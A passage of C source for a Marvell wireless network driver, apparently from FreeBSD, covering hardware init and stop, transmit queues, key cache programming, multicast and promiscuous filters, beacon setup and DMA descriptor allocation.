mwl_hal_setregioncode(mh, mwl_map2regioncode(&ic->ic_regdomain)); mwl_hal_setaggampduratemode(mh, 1, 80); /* XXX */ mwl_hal_setcfend(mh, 0); /* XXX */ return 1; } static int mwl_init_locked(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct mwl_hal *mh = sc->sc_mh; int error = 0; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); MWL_LOCK_ASSERT(sc); /* * Stop anything previously setup. This is safe * whether this is the first time through or not. */ mwl_stop_locked(ifp, 0); /* * Push vap-independent state to the firmware. */ if (!mwl_hal_reset(sc)) { if_printf(ifp, "unable to reset hardware\n"); return EIO; } /* * Setup recv (once); transmit is already good to go. */ error = mwl_startrecv(sc); if (error != 0) { if_printf(ifp, "unable to start recv logic\n"); return error; } /* * Enable interrupts. 
*/ sc->sc_imask = MACREG_A2HRIC_BIT_RX_RDY | MACREG_A2HRIC_BIT_TX_DONE | MACREG_A2HRIC_BIT_OPC_DONE #if 0 | MACREG_A2HRIC_BIT_MAC_EVENT #endif | MACREG_A2HRIC_BIT_ICV_ERROR | MACREG_A2HRIC_BIT_RADAR_DETECT | MACREG_A2HRIC_BIT_CHAN_SWITCH #if 0 | MACREG_A2HRIC_BIT_QUEUE_EMPTY #endif | MACREG_A2HRIC_BIT_BA_WATCHDOG | MACREQ_A2HRIC_BIT_TX_ACK ; ifp->if_drv_flags |= IFF_DRV_RUNNING; mwl_hal_intrset(mh, sc->sc_imask); callout_reset(&sc->sc_watchdog, hz, mwl_watchdog, sc); return 0; } static void mwl_init(void *arg) { struct mwl_softc *sc = arg; struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; int error = 0; DPRINTF(sc, MWL_DEBUG_ANY, "%s: if_flags 0x%x\n", __func__, ifp->if_flags); MWL_LOCK(sc); error = mwl_init_locked(sc); MWL_UNLOCK(sc); if (error == 0) ieee80211_start_all(ic); /* start all vap's */ } static void mwl_stop_locked(struct ifnet *ifp, int disable) { struct mwl_softc *sc = ifp->if_softc; DPRINTF(sc, MWL_DEBUG_ANY, "%s: invalid %u if_flags 0x%x\n", __func__, sc->sc_invalid, ifp->if_flags); MWL_LOCK_ASSERT(sc); if (ifp->if_drv_flags & IFF_DRV_RUNNING) { /* * Shutdown the hardware and driver. */ ifp->if_drv_flags &= ~IFF_DRV_RUNNING; callout_stop(&sc->sc_watchdog); sc->sc_tx_timer = 0; mwl_draintxq(sc); } } static void mwl_stop(struct ifnet *ifp, int disable) { struct mwl_softc *sc = ifp->if_softc; MWL_LOCK(sc); mwl_stop_locked(ifp, disable); MWL_UNLOCK(sc); } static int mwl_reset_vap(struct ieee80211vap *vap, int state) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; struct ieee80211com *ic = vap->iv_ic; if (state == IEEE80211_S_RUN) mwl_setrates(vap); /* XXX off by 1? */ mwl_hal_setrtsthreshold(hvap, vap->iv_rtsthreshold); /* XXX auto? 20/40 split? */ mwl_hal_sethtgi(hvap, (vap->iv_flags_ht & (IEEE80211_FHT_SHORTGI20|IEEE80211_FHT_SHORTGI40)) ? 1 : 0); mwl_hal_setnprot(hvap, ic->ic_htprotmode == IEEE80211_PROT_NONE ? HTPROTECT_NONE : HTPROTECT_AUTO); /* XXX txpower cap */ /* re-setup beacons */ if (state == IEEE80211_S_RUN && (vap->iv_opmode == IEEE80211_M_HOSTAP || vap->iv_opmode == IEEE80211_M_MBSS || vap->iv_opmode == IEEE80211_M_IBSS)) { mwl_setapmode(vap, vap->iv_bss->ni_chan); mwl_hal_setnprotmode(hvap, MS(ic->ic_curhtprotmode, IEEE80211_HTINFO_OPMODE)); return mwl_beacon_setup(vap); } return 0; } /* * Reset the hardware w/o losing operational state. * Used to to reset or reload hardware state for a vap. */ static int mwl_reset(struct ieee80211vap *vap, u_long cmd) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; int error = 0; if (hvap != NULL) { /* WDS, MONITOR, etc. */ struct ieee80211com *ic = vap->iv_ic; struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; struct mwl_hal *mh = sc->sc_mh; /* XXX handle DWDS sta vap change */ /* XXX do we need to disable interrupts? */ mwl_hal_intrset(mh, 0); /* disable interrupts */ error = mwl_reset_vap(vap, vap->iv_state); mwl_hal_intrset(mh, sc->sc_imask); } return error; } /* * Allocate a tx buffer for sending a frame. The * packet is assumed to have the WME AC stored so * we can use it to select the appropriate h/w queue. */ static struct mwl_txbuf * mwl_gettxbuf(struct mwl_softc *sc, struct mwl_txq *txq) { struct mwl_txbuf *bf; /* * Grab a TX buffer and associated resources. */ MWL_TXQ_LOCK(txq); bf = STAILQ_FIRST(&txq->free); if (bf != NULL) { STAILQ_REMOVE_HEAD(&txq->free, bf_list); txq->nfree--; } MWL_TXQ_UNLOCK(txq); if (bf == NULL) DPRINTF(sc, MWL_DEBUG_XMIT, "%s: out of xmit buffers on q %d\n", __func__, txq->qnum); return bf; } /* * Return a tx buffer to the queue it came from. 
Note there * are two cases because we must preserve the order of buffers * as it reflects the fixed order of descriptors in memory * (the firmware pre-fetches descriptors so we cannot reorder). */ static void mwl_puttxbuf_head(struct mwl_txq *txq, struct mwl_txbuf *bf) { bf->bf_m = NULL; bf->bf_node = NULL; MWL_TXQ_LOCK(txq); STAILQ_INSERT_HEAD(&txq->free, bf, bf_list); txq->nfree++; MWL_TXQ_UNLOCK(txq); } static void mwl_puttxbuf_tail(struct mwl_txq *txq, struct mwl_txbuf *bf) { bf->bf_m = NULL; bf->bf_node = NULL; MWL_TXQ_LOCK(txq); STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree++; MWL_TXQ_UNLOCK(txq); } static void mwl_start(struct ifnet *ifp) { struct mwl_softc *sc = ifp->if_softc; struct ieee80211_node *ni; struct mwl_txbuf *bf; struct mbuf *m; struct mwl_txq *txq = NULL; /* XXX silence gcc */ int nqueued; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->sc_invalid) return; nqueued = 0; for (;;) { bf = NULL; IFQ_DEQUEUE(&ifp->if_snd, m); if (m == NULL) break; /* * Grab the node for the destination. */ ni = (struct ieee80211_node *) m->m_pkthdr.rcvif; KASSERT(ni != NULL, ("no node")); m->m_pkthdr.rcvif = NULL; /* committed, clear ref */ /* * Grab a TX buffer and associated resources. * We honor the classification by the 802.11 layer. */ txq = sc->sc_ac2q[M_WME_GETAC(m)]; bf = mwl_gettxbuf(sc, txq); if (bf == NULL) { m_freem(m); ieee80211_free_node(ni); #ifdef MWL_TX_NODROP sc->sc_stats.mst_tx_qstop++; /* XXX blocks other traffic */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; break; #else DPRINTF(sc, MWL_DEBUG_XMIT, "%s: tail drop on q %d\n", __func__, txq->qnum); sc->sc_stats.mst_tx_qdrop++; continue; #endif /* MWL_TX_NODROP */ } /* * Pass the frame to the h/w for transmission. */ if (mwl_tx_start(sc, ni, bf, m)) { ifp->if_oerrors++; mwl_puttxbuf_head(txq, bf); ieee80211_free_node(ni); continue; } nqueued++; if (nqueued >= mwl_txcoalesce) { /* * Poke the firmware to process queued frames; * see below about (lack of) locking. */ nqueued = 0; mwl_hal_txstart(sc->sc_mh, 0/*XXX*/); } } if (nqueued) { /* * NB: We don't need to lock against tx done because * this just prods the firmware to check the transmit * descriptors. The firmware will also start fetching * descriptors by itself if it notices new ones are * present when it goes to deliver a tx done interrupt * to the host. So if we race with tx done processing * it's ok. Delivering the kick here rather than in * mwl_tx_start is an optimization to avoid poking the * firmware for each packet. * * NB: the queue id isn't used so 0 is ok. */ mwl_hal_txstart(sc->sc_mh, 0/*XXX*/); } } static int mwl_raw_xmit(struct ieee80211_node *ni, struct mbuf *m, const struct ieee80211_bpf_params *params) { struct ieee80211com *ic = ni->ni_ic; struct ifnet *ifp = ic->ic_ifp; struct mwl_softc *sc = ifp->if_softc; struct mwl_txbuf *bf; struct mwl_txq *txq; if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0 || sc->sc_invalid) { ieee80211_free_node(ni); m_freem(m); return ENETDOWN; } /* * Grab a TX buffer and associated resources. * Note that we depend on the classification * by the 802.11 layer to get to the right h/w * queue. Management frames must ALWAYS go on * queue 1 but we cannot just force that here * because we may receive non-mgt frames. */ txq = sc->sc_ac2q[M_WME_GETAC(m)]; bf = mwl_gettxbuf(sc, txq); if (bf == NULL) { sc->sc_stats.mst_tx_qstop++; /* XXX blocks other traffic */ ifp->if_drv_flags |= IFF_DRV_OACTIVE; ieee80211_free_node(ni); m_freem(m); return ENOBUFS; } /* * Pass the frame to the h/w for transmission. 
*/ if (mwl_tx_start(sc, ni, bf, m)) { ifp->if_oerrors++; mwl_puttxbuf_head(txq, bf); ieee80211_free_node(ni); return EIO; /* XXX */ } /* * NB: We don't need to lock against tx done because * this just prods the firmware to check the transmit * descriptors. The firmware will also start fetching * descriptors by itself if it notices new ones are * present when it goes to deliver a tx done interrupt * to the host. So if we race with tx done processing * it's ok. Delivering the kick here rather than in * mwl_tx_start is an optimization to avoid poking the * firmware for each packet. * * NB: the queue id isn't used so 0 is ok. */ mwl_hal_txstart(sc->sc_mh, 0/*XXX*/); return 0; } static int mwl_media_change(struct ifnet *ifp) { struct ieee80211vap *vap = ifp->if_softc; int error; error = ieee80211_media_change(ifp); /* NB: only the fixed rate can change and that doesn't need a reset */ if (error == ENETRESET) { mwl_setrates(vap); error = 0; } return error; } #ifdef MWL_DEBUG static void mwl_keyprint(struct mwl_softc *sc, const char *tag, const MWL_HAL_KEYVAL *hk, const uint8_t mac[IEEE80211_ADDR_LEN]) { static const char *ciphers[] = { "WEP", "TKIP", "AES-CCM", }; int i, n; printf("%s: [%u] %-7s", tag, hk->keyIndex, ciphers[hk->keyTypeId]); for (i = 0, n = hk->keyLen; i < n; i++) printf(" %02x", hk->key.aes[i]); printf(" mac %s", ether_sprintf(mac)); if (hk->keyTypeId == KEY_TYPE_ID_TKIP) { printf(" %s", "rxmic"); for (i = 0; i < sizeof(hk->key.tkip.rxMic); i++) printf(" %02x", hk->key.tkip.rxMic[i]); printf(" txmic"); for (i = 0; i < sizeof(hk->key.tkip.txMic); i++) printf(" %02x", hk->key.tkip.txMic[i]); } printf(" flags 0x%x\n", hk->keyFlags); } #endif /* * Allocate a key cache slot for a unicast key. The * firmware handles key allocation and every station is * guaranteed key space so we are always successful. */ static int mwl_key_alloc(struct ieee80211vap *vap, struct ieee80211_key *k, ieee80211_keyix *keyix, ieee80211_keyix *rxkeyix) { struct mwl_softc *sc = vap->iv_ic->ic_ifp->if_softc; if (k->wk_keyix != IEEE80211_KEYIX_NONE || (k->wk_flags & IEEE80211_KEY_GROUP)) { if (!(&vap->iv_nw_keys[0] <= k && k < &vap->iv_nw_keys[IEEE80211_WEP_NKID])) { /* should not happen */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: bogus group key\n", __func__); return 0; } /* give the caller what they requested */ *keyix = *rxkeyix = k - vap->iv_nw_keys; } else { /* * Firmware handles key allocation. */ *keyix = *rxkeyix = 0; } return 1; } /* * Delete a key entry allocated by mwl_key_alloc. */ static int mwl_key_delete(struct ieee80211vap *vap, const struct ieee80211_key *k) { struct mwl_softc *sc = vap->iv_ic->ic_ifp->if_softc; struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; MWL_HAL_KEYVAL hk; const uint8_t bcastaddr[IEEE80211_ADDR_LEN] = { 0xff, 0xff, 0xff, 0xff, 0xff, 0xff }; if (hvap == NULL) { if (vap->iv_opmode != IEEE80211_M_WDS) { /* XXX monitor mode? 
*/ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: no hvap for opmode %d\n", __func__, vap->iv_opmode); return 0; } hvap = MWL_VAP(vap)->mv_ap_hvap; } DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: delete key %u\n", __func__, k->wk_keyix); memset(&hk, 0, sizeof(hk)); hk.keyIndex = k->wk_keyix; switch (k->wk_cipher->ic_cipher) { case IEEE80211_CIPHER_WEP: hk.keyTypeId = KEY_TYPE_ID_WEP; break; case IEEE80211_CIPHER_TKIP: hk.keyTypeId = KEY_TYPE_ID_TKIP; break; case IEEE80211_CIPHER_AES_CCM: hk.keyTypeId = KEY_TYPE_ID_AES; break; default: /* XXX should not happen */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: unknown cipher %d\n", __func__, k->wk_cipher->ic_cipher); return 0; } return (mwl_hal_keyreset(hvap, &hk, bcastaddr) == 0); /*XXX*/ } static __inline int addgroupflags(MWL_HAL_KEYVAL *hk, const struct ieee80211_key *k) { if (k->wk_flags & IEEE80211_KEY_GROUP) { if (k->wk_flags & IEEE80211_KEY_XMIT) hk->keyFlags |= KEY_FLAG_TXGROUPKEY; if (k->wk_flags & IEEE80211_KEY_RECV) hk->keyFlags |= KEY_FLAG_RXGROUPKEY; return 1; } else return 0; } /* * Set the key cache contents for the specified key. Key cache * slot(s) must already have been allocated by mwl_key_alloc. */ static int mwl_key_set(struct ieee80211vap *vap, const struct ieee80211_key *k, const uint8_t mac[IEEE80211_ADDR_LEN]) { #define GRPXMIT (IEEE80211_KEY_XMIT | IEEE80211_KEY_GROUP) /* NB: static wep keys are marked GROUP+tx/rx; GTK will be tx or rx */ #define IEEE80211_IS_STATICKEY(k) \ (((k)->wk_flags & (GRPXMIT|IEEE80211_KEY_RECV)) == \ (GRPXMIT|IEEE80211_KEY_RECV)) struct mwl_softc *sc = vap->iv_ic->ic_ifp->if_softc; struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; const struct ieee80211_cipher *cip = k->wk_cipher; const uint8_t *macaddr; MWL_HAL_KEYVAL hk; KASSERT((k->wk_flags & IEEE80211_KEY_SWCRYPT) == 0, ("s/w crypto set?")); if (hvap == NULL) { if (vap->iv_opmode != IEEE80211_M_WDS) { /* XXX monitor mode? */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: no hvap for opmode %d\n", __func__, vap->iv_opmode); return 0; } hvap = MWL_VAP(vap)->mv_ap_hvap; } memset(&hk, 0, sizeof(hk)); hk.keyIndex = k->wk_keyix; switch (cip->ic_cipher) { case IEEE80211_CIPHER_WEP: hk.keyTypeId = KEY_TYPE_ID_WEP; hk.keyLen = k->wk_keylen; if (k->wk_keyix == vap->iv_def_txkey) hk.keyFlags = KEY_FLAG_WEP_TXKEY; if (!IEEE80211_IS_STATICKEY(k)) { /* NB: WEP is never used for the PTK */ (void) addgroupflags(&hk, k); } break; case IEEE80211_CIPHER_TKIP: hk.keyTypeId = KEY_TYPE_ID_TKIP; hk.key.tkip.tsc.high = (uint32_t)(k->wk_keytsc >> 16); hk.key.tkip.tsc.low = (uint16_t)k->wk_keytsc; hk.keyFlags = KEY_FLAG_TSC_VALID | KEY_FLAG_MICKEY_VALID; hk.keyLen = k->wk_keylen + IEEE80211_MICBUF_SIZE; if (!addgroupflags(&hk, k)) hk.keyFlags |= KEY_FLAG_PAIRWISE; break; case IEEE80211_CIPHER_AES_CCM: hk.keyTypeId = KEY_TYPE_ID_AES; hk.keyLen = k->wk_keylen; if (!addgroupflags(&hk, k)) hk.keyFlags |= KEY_FLAG_PAIRWISE; break; default: /* XXX should not happen */ DPRINTF(sc, MWL_DEBUG_KEYCACHE, "%s: unknown cipher %d\n", __func__, k->wk_cipher->ic_cipher); return 0; } /* * NB: tkip mic keys get copied here too; the layout * just happens to match that in ieee80211_key. */ memcpy(hk.key.aes, k->wk_key, hk.keyLen); /* * Locate address of sta db entry for writing key; * the convention unfortunately is somewhat different * than how net80211, hostapd, and wpa_supplicant think. */ if (vap->iv_opmode == IEEE80211_M_STA) { /* * NB: keys plumbed before the sta reaches AUTH state * will be discarded or written to the wrong sta db * entry because iv_bss is meaningless. 
This is ok * (right now) because we handle deferred plumbing of * WEP keys when the sta reaches AUTH state. */ macaddr = vap->iv_bss->ni_bssid; if ((k->wk_flags & IEEE80211_KEY_GROUP) == 0) { /* XXX plumb to local sta db too for static key wep */ mwl_hal_keyset(hvap, &hk, vap->iv_myaddr); } } else if (vap->iv_opmode == IEEE80211_M_WDS && vap->iv_state != IEEE80211_S_RUN) { /* * Prior to RUN state a WDS vap will not it's BSS node * setup so we will plumb the key to the wrong mac * address (it'll be our local address). Workaround * this for the moment by grabbing the correct address. */ macaddr = vap->iv_des_bssid; } else if ((k->wk_flags & GRPXMIT) == GRPXMIT) macaddr = vap->iv_myaddr; else macaddr = mac; KEYPRINTF(sc, &hk, macaddr); return (mwl_hal_keyset(hvap, &hk, macaddr) == 0); #undef IEEE80211_IS_STATICKEY #undef GRPXMIT } /* unaligned little endian access */ #define LE_READ_2(p) \ ((uint16_t) \ ((((const uint8_t *)(p))[0] ) | \ (((const uint8_t *)(p))[1] << 8))) #define LE_READ_4(p) \ ((uint32_t) \ ((((const uint8_t *)(p))[0] ) | \ (((const uint8_t *)(p))[1] << 8) | \ (((const uint8_t *)(p))[2] << 16) | \ (((const uint8_t *)(p))[3] << 24))) /* * Set the multicast filter contents into the hardware. * XXX f/w has no support; just defer to the os. */ static void mwl_setmcastfilter(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; #if 0 struct ether_multi *enm; struct ether_multistep estep; uint8_t macs[IEEE80211_ADDR_LEN*MWL_HAL_MCAST_MAX];/* XXX stack use */ uint8_t *mp; int nmc; mp = macs; nmc = 0; ETHER_FIRST_MULTI(estep, &sc->sc_ec, enm); while (enm != NULL) { /* XXX Punt on ranges. */ if (nmc == MWL_HAL_MCAST_MAX || !IEEE80211_ADDR_EQ(enm->enm_addrlo, enm->enm_addrhi)) { ifp->if_flags |= IFF_ALLMULTI; return; } IEEE80211_ADDR_COPY(mp, enm->enm_addrlo); mp += IEEE80211_ADDR_LEN, nmc++; ETHER_NEXT_MULTI(estep, enm); } ifp->if_flags &= ~IFF_ALLMULTI; mwl_hal_setmcast(sc->sc_mh, nmc, macs); #else /* XXX no mcast filter support; we get everything */ ifp->if_flags |= IFF_ALLMULTI; #endif } static int mwl_mode_init(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; struct ieee80211com *ic = ifp->if_l2com; struct mwl_hal *mh = sc->sc_mh; /* * NB: Ignore promisc in hostap mode; it's set by the * bridge. This is wrong but we have no way to * identify internal requests (from the bridge) * versus external requests such as for tcpdump. */ mwl_hal_setpromisc(mh, (ifp->if_flags & IFF_PROMISC) && ic->ic_opmode != IEEE80211_M_HOSTAP); mwl_setmcastfilter(sc); return 0; } /* * Callback from the 802.11 layer after a multicast state change. */ static void mwl_update_mcast(struct ifnet *ifp) { struct mwl_softc *sc = ifp->if_softc; mwl_setmcastfilter(sc); } /* * Callback from the 802.11 layer after a promiscuous mode change. * Note this interface does not check the operating mode as this * is an internal callback and we are expected to honor the current * state (e.g. this is used for setting the interface in promiscuous * mode when operating in hostap mode to do ACS). */ static void mwl_update_promisc(struct ifnet *ifp) { struct mwl_softc *sc = ifp->if_softc; mwl_hal_setpromisc(sc->sc_mh, (ifp->if_flags & IFF_PROMISC) != 0); } /* * Callback from the 802.11 layer to update the slot time * based on the current setting. We use it to notify the * firmware of ERP changes and the f/w takes care of things * like slot time and preamble. 
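 *
 * A sketch of the resulting flags (illustrative scenario): on a 2.4GHz
 * ERP channel with a long-slot-only station present and protection in
 * use, the value handed to mwl_hal_setgprot() below would be
 *
 *	prot = IEEE80211_ERP_NON_ERP_PRESENT | IEEE80211_ERP_USE_PROTECTION;
 *
 * whereas on a 5GHz channel prot stays 0 and no ERP measures apply.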
*/ static void mwl_updateslot(struct ifnet *ifp) { struct mwl_softc *sc = ifp->if_softc; struct ieee80211com *ic = ifp->if_l2com; struct mwl_hal *mh = sc->sc_mh; int prot; /* NB: can be called early; suppress needless cmds */ if ((ifp->if_drv_flags & IFF_DRV_RUNNING) == 0) return; /* * Calculate the ERP flags. The firwmare will use * this to carry out the appropriate measures. */ prot = 0; if (IEEE80211_IS_CHAN_ANYG(ic->ic_curchan)) { if ((ic->ic_flags & IEEE80211_F_SHSLOT) == 0) prot |= IEEE80211_ERP_NON_ERP_PRESENT; if (ic->ic_flags & IEEE80211_F_USEPROT) prot |= IEEE80211_ERP_USE_PROTECTION; if (ic->ic_flags & IEEE80211_F_USEBARKER) prot |= IEEE80211_ERP_LONG_PREAMBLE; } DPRINTF(sc, MWL_DEBUG_RESET, "%s: chan %u MHz/flags 0x%x %s slot, (prot 0x%x ic_flags 0x%x)\n", __func__, ic->ic_curchan->ic_freq, ic->ic_curchan->ic_flags, ic->ic_flags & IEEE80211_F_SHSLOT ? "short" : "long", prot, ic->ic_flags); mwl_hal_setgprot(mh, prot); } /* * Setup the beacon frame. */ static int mwl_beacon_setup(struct ieee80211vap *vap) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; struct ieee80211_node *ni = vap->iv_bss; struct ieee80211_beacon_offsets bo; struct mbuf *m; m = ieee80211_beacon_alloc(ni, &bo); if (m == NULL) return ENOBUFS; mwl_hal_setbeacon(hvap, mtod(m, const void *), m->m_len); m_free(m); return 0; } /* * Update the beacon frame in response to a change. */ static void mwl_beacon_update(struct ieee80211vap *vap, int item) { struct mwl_hal_vap *hvap = MWL_VAP(vap)->mv_hvap; struct ieee80211com *ic = vap->iv_ic; KASSERT(hvap != NULL, ("no beacon")); switch (item) { case IEEE80211_BEACON_ERP: mwl_updateslot(ic->ic_ifp); break; case IEEE80211_BEACON_HTINFO: mwl_hal_setnprotmode(hvap, MS(ic->ic_curhtprotmode, IEEE80211_HTINFO_OPMODE)); break; case IEEE80211_BEACON_CAPS: case IEEE80211_BEACON_WME: case IEEE80211_BEACON_APPIE: case IEEE80211_BEACON_CSA: break; case IEEE80211_BEACON_TIM: /* NB: firmware always forms TIM */ return; } /* XXX retain beacon frame and update */ mwl_beacon_setup(vap); } static void mwl_load_cb(void *arg, bus_dma_segment_t *segs, int nsegs, int error) { bus_addr_t *paddr = (bus_addr_t*) arg; KASSERT(error == 0, ("error %u on bus_dma callback", error)); *paddr = segs->ds_addr; } #ifdef MWL_HOST_PS_SUPPORT /* * Handle power save station occupancy changes. */ static void mwl_update_ps(struct ieee80211vap *vap, int nsta) { struct mwl_vap *mvp = MWL_VAP(vap); if (nsta == 0 || mvp->mv_last_ps_sta == 0) mwl_hal_setpowersave_bss(mvp->mv_hvap, nsta); mvp->mv_last_ps_sta = nsta; } /* * Handle associated station power save state changes. */ static int mwl_set_tim(struct ieee80211_node *ni, int set) { struct ieee80211vap *vap = ni->ni_vap; struct mwl_vap *mvp = MWL_VAP(vap); if (mvp->mv_set_tim(ni, set)) { /* NB: state change */ mwl_hal_setpowersave_sta(mvp->mv_hvap, IEEE80211_AID(ni->ni_associd), set); return 1; } else return 0; } #endif /* MWL_HOST_PS_SUPPORT */ static int mwl_desc_setup(struct mwl_softc *sc, const char *name, struct mwl_descdma *dd, int nbuf, size_t bufsize, int ndesc, size_t descsize) { struct ifnet *ifp = sc->sc_ifp; uint8_t *ds; int error; DPRINTF(sc, MWL_DEBUG_RESET, "%s: %s DMA: %u bufs (%ju) %u desc/buf (%ju)\n", __func__, name, nbuf, (uintmax_t) bufsize, ndesc, (uintmax_t) descsize); dd->dd_name = name; dd->dd_desc_len = nbuf * ndesc * descsize; /* * Setup DMA descriptor area. 
*/ error = bus_dma_tag_create(bus_get_dma_tag(sc->sc_dev), /* parent */ PAGE_SIZE, 0, /* alignment, bounds */ BUS_SPACE_MAXADDR_32BIT, /* lowaddr */ BUS_SPACE_MAXADDR, /* highaddr */ NULL, NULL, /* filter, filterarg */ dd->dd_desc_len, /* maxsize */ 1, /* nsegments */ dd->dd_desc_len, /* maxsegsize */ BUS_DMA_ALLOCNOW, /* flags */ NULL, /* lockfunc */ NULL, /* lockarg */ &dd->dd_dmat); if (error != 0) { if_printf(ifp, "cannot allocate %s DMA tag\n", dd->dd_name); return error; } /* allocate descriptors */ error = bus_dmamap_create(dd->dd_dmat, BUS_DMA_NOWAIT, &dd->dd_dmamap); if (error != 0) { if_printf(ifp, "unable to create dmamap for %s descriptors, " "error %u\n", dd->dd_name, error); goto fail0; } error = bus_dmamem_alloc(dd->dd_dmat, (void**) &dd->dd_desc, BUS_DMA_NOWAIT | BUS_DMA_COHERENT, &dd->dd_dmamap); if (error != 0) { if_printf(ifp, "unable to alloc memory for %u %s descriptors, " "error %u\n", nbuf * ndesc, dd->dd_name, error); goto fail1; } error = bus_dmamap_load(dd->dd_dmat, dd->dd_dmamap, dd->dd_desc, dd->dd_desc_len, mwl_load_cb, &dd->dd_desc_paddr, BUS_DMA_NOWAIT); if (error != 0) { if_printf(ifp, "unable to map %s descriptors, error %u\n", dd->dd_name, error); goto fail2; } ds = dd->dd_desc; memset(ds, 0, dd->dd_desc_len); DPRINTF(sc, MWL_DEBUG_RESET, "%s: %s DMA map: %p (%lu) -> %p (%lu)\n", __func__, dd->dd_name, ds, (u_long) dd->dd_desc_len, (caddr_t) dd->dd_desc_paddr, /*XXX*/ (u_long) dd->dd_desc_len); return 0; fail2: bus_dmamem_free(dd->dd_dmat, dd->dd_desc, dd->dd_dmamap); fail1: bus_dmamap_destroy(dd->dd_dmat, dd->dd_dmamap); fail0: bus_dma_tag_destroy(dd->dd_dmat); memset(dd, 0, sizeof(*dd)); return error; #undef DS2PHYS } static void mwl_desc_cleanup(struct mwl_softc *sc, struct mwl_descdma *dd) { bus_dmamap_unload(dd->dd_dmat, dd->dd_dmamap); bus_dmamem_free(dd->dd_dmat, dd->dd_desc, dd->dd_dmamap); bus_dmamap_destroy(dd->dd_dmat, dd->dd_dmamap); bus_dma_tag_destroy(dd->dd_dmat); memset(dd, 0, sizeof(*dd)); } /* * Construct a tx q's free list. The order of entries on * the list must reflect the physical layout of tx descriptors * because the firmware pre-fetches descriptors. * * XXX might be better to use indices into the buffer array. 
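 *
 * Illustrative sketch of why the order matters: the descriptors come out
 * of one contiguous DMA allocation, so each buffer's descriptor sits at a
 * fixed physical offset,
 *
 *	bf->bf_daddr = DS2PHYS(&txq->dma, ds)
 *	             = dd_desc_paddr + ((caddr_t)ds - (caddr_t)dd_desc)
 *
 * and mwl_txq_init() chains pPhysNext from each descriptor to the next
 * (wrapping at the end); a free list built in any other order would have
 * the firmware pre-fetching descriptors the driver is not about to use.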
*/ static void mwl_txq_reset(struct mwl_softc *sc, struct mwl_txq *txq) { struct mwl_txbuf *bf; int i; bf = txq->dma.dd_bufptr; STAILQ_INIT(&txq->free); for (i = 0; i < mwl_txbuf; i++, bf++) STAILQ_INSERT_TAIL(&txq->free, bf, bf_list); txq->nfree = i; } #define DS2PHYS(_dd, _ds) \ ((_dd)->dd_desc_paddr + ((caddr_t)(_ds) - (caddr_t)(_dd)->dd_desc)) static int mwl_txdma_setup(struct mwl_softc *sc, struct mwl_txq *txq) { struct ifnet *ifp = sc->sc_ifp; int error, bsize, i; struct mwl_txbuf *bf; struct mwl_txdesc *ds; error = mwl_desc_setup(sc, "tx", &txq->dma, mwl_txbuf, sizeof(struct mwl_txbuf), MWL_TXDESC, sizeof(struct mwl_txdesc)); if (error != 0) return error; /* allocate and setup tx buffers */ bsize = mwl_txbuf * sizeof(struct mwl_txbuf); bf = malloc(bsize, M_MWLDEV, M_NOWAIT | M_ZERO); if (bf == NULL) { if_printf(ifp, "malloc of %u tx buffers failed\n", mwl_txbuf); return ENOMEM; } txq->dma.dd_bufptr = bf; ds = txq->dma.dd_desc; for (i = 0; i < mwl_txbuf; i++, bf++, ds += MWL_TXDESC) { bf->bf_desc = ds; bf->bf_daddr = DS2PHYS(&txq->dma, ds); error = bus_dmamap_create(sc->sc_dmat, BUS_DMA_NOWAIT, &bf->bf_dmamap); if (error != 0) { if_printf(ifp, "unable to create dmamap for tx " "buffer %u, error %u\n", i, error); return error; } } mwl_txq_reset(sc, txq); return 0; } static void mwl_txdma_cleanup(struct mwl_softc *sc, struct mwl_txq *txq) { struct mwl_txbuf *bf; int i; bf = txq->dma.dd_bufptr; for (i = 0; i < mwl_txbuf; i++, bf++) { KASSERT(bf->bf_m == NULL, ("mbuf on free list")); KASSERT(bf->bf_node == NULL, ("node on free list")); if (bf->bf_dmamap != NULL) bus_dmamap_destroy(sc->sc_dmat, bf->bf_dmamap); } STAILQ_INIT(&txq->free); txq->nfree = 0; if (txq->dma.dd_bufptr != NULL) { free(txq->dma.dd_bufptr, M_MWLDEV); txq->dma.dd_bufptr = NULL; } if (txq->dma.dd_desc_len != 0) mwl_desc_cleanup(sc, &txq->dma); } static int mwl_rxdma_setup(struct mwl_softc *sc) { struct ifnet *ifp = sc->sc_ifp; int error, jumbosize, bsize, i; struct mwl_rxbuf *bf; struct mwl_jumbo *rbuf; struct mwl_rxdesc *ds; caddr_t data; error = mwl_desc_setup(sc, "rx", &sc->sc_rxdma, mwl_rxdesc, sizeof(struct mwl_rxbuf), 1, sizeof(struct mwl_rxdesc)); if (error != 0) return error; /* * Receive is done to a private pool of jumbo buffers. * This allows us to attach to mbuf's and avoid re-mapping * memory on each rx we post. We allocate a large chunk * of memory and manage it in the driver. The mbuf free * callback method is used to reclaim frames after sending * them up the stack. By default we allocate 2x the number of * rx descriptors configured so we have some slop to hold * us while frames are processed. 
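 *
 * Rough sizing example (numbers are assumptions, not necessarily the
 * compiled-in defaults): with mwl_rxdesc = 256, MWL_AGGR_SIZE = 3839 and
 * PAGE_SIZE = 4096,
 *
 *	jumbosize    = roundup(3839, 4096) = 4096 bytes
 *	mwl_rxbuf    = 2 * 256 = 512 buffers
 *	sc_rxmemsize = 512 * 4096 = 2MB of rx DMA memory
 *
 * so raising mwl_rxdesc grows the wired allocation proportionally.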
